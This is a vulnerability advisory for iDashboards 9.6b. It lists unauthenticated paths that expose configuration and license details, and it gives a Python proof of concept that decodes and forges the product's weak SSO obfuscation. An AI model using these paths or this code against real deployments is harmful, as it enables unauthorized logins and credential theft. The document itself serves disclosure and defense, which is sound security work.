iDashboards 9.6b, Multiple Vulnerabilities

# Authors: Andrea Ferraris, Raffaele Forte
# Vendor Homepage: https://www.idashboards.com/
# Version: 9.6b and earlier

I. INTRODUCTION
iDashboard is a closed-source system that allows to visualize data in form of graph.

II. DESCRIPTION
The web application suffers from multiple vulnerabilities.

1. Sensitive Data Exposure

Using specific paths an unauthenticated user can obtain various information about the system.

a. Configuration Disclosure (CVE-2018-7209)

Using this URL “https://<url>/idashboards/config.xml” it is possible to obtain information such as version, url, etc.:

[...]
<serverURL>/idashboards/idb?CMD=$C$</serverURL>
<dashReportURL>/idashboards/idb/reports/prep/d/$DASH_ID$/$FORMAT$/$INLINE$/</dashReportURL>
<chartReportURL>/idashboards/idb/reports/prep/c/$CHART_ID$-$DASH_ID$/$FORMAT$/$INLINE$/</chartReportURL>
<serverRoot>/idashboards/</serverRoot>
[...]
<version>9.6b</version>
<productID>9.6b-181217101653-160.45</productID>
<companyName>XXX snc | XXX </companyName>
[...]
<adminUrl>http://XXXXXXX:6700/idashboards/admin/</adminUrl>
[...]

b. License information disclosure (CVE-2018-7210)

In order to install the license in the application, the administrator should go to “https://<url>/idb/config?CMD=installLicense”.

If the license is already applied, this page is reachable from unauthenticated user. In this case, an attacker can obtain information about the system (type of license, internal IP address, ecc.) and guest accounts (if present):

Licensed to: XXX snc
License expires: Never
Licensed CPUs: Unlimited
Number of named users: 51
Number of concurrent users: 51
Guest users: guest
Licensed IP Addresses: 10.1.1.7
Licensed Domain(s): 
Server Name: XXXDASHBOARDS
Server IP Address: 10.1.1.7
Server CPUs: 8
License type: XXX-XX-XXXX

2. Reverse engineering of SSO obfuscation (CVE-2018-7211)

As AdminManual said the SSO obfuscation is weak:

The iDashboards obfuscation library uses a proprietary, weak two-way encryption algorithm to obfuscate text. It is possible that a resourceful attacker could reverse-engineer the algorithm and use it to obfuscate SSO login URLs, or decode obfuscated ones. Moreover, anyone with access to the idb_encrypt.jar file or idb_encrypt.dll, and the proper knowledge, could use it to obfuscate SSO login URLs.

It is possible to reverse engineering the algorithm as we can see in the PoC below:

[PoC_iDashboard.py]

import sys

def encrypt(string):
    i=0
    out=""
    for c in string:
        power=pow(2,i)
        if power == 256:
            i=0
            power=pow(2,i)
        i+=1
        val=ord(c)
        k=val // power
        if k % 2 == 0:
            val+=power
        else:
            val-=power
        out+=str(hex(val)).replace('0x','')
        #print "Power:"+str(power)+" - Before:"+str(hex(ord(c)))+" - After:"+str(hex(val))
    return out
    
def decrypt(string):
    i=0
    k=0
    array=[]    
    l=len(string)-1
    while k < l:
        array.append(int(string[k:k+2],16))    
        k+=2
    out=""
    for c in array:
        power=pow(2,i)
        if power == 256:
            i=0
            power=pow(2,i)
        i+=1
        val=c
        k=val // power
        if k % 2 == 0:
            val+=power
        else:
            val-=power
        out+=chr(val)
        #print "Power:"+str(power)+" - Before:"+str(hex(c))+" - After:"+str(hex(val))+ " - Char:"+chr(val)
    return out

def main(args):
    if len(args)<3:
        print "Usage: "+args[0]+ "  " +" string"
        return
    if args[1] == 'd':
        o=decrypt(args[2])
    elif args[1] == 'e':
        o=encrypt(args[2])
    print o

if __name__=='__main__':
    main(sys.argv)

IV. BUSINESS IMPACT
These flaws may compromise the integrity of the system and/or expose sensitive information.
Moreover, SSO reverse engineer allows to obtain user and password with a MiTM position.

V. SYSTEMS AFFECTED
iDashboard v9.6b is vulnerable (probably all previous versions)

VI. VULNERABILITY HISTORY
January 30th, 2018: Vulnerability identification
February 16th, 2018: Vendor notification
February 18th, 2018: CVE-ID reserved

VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.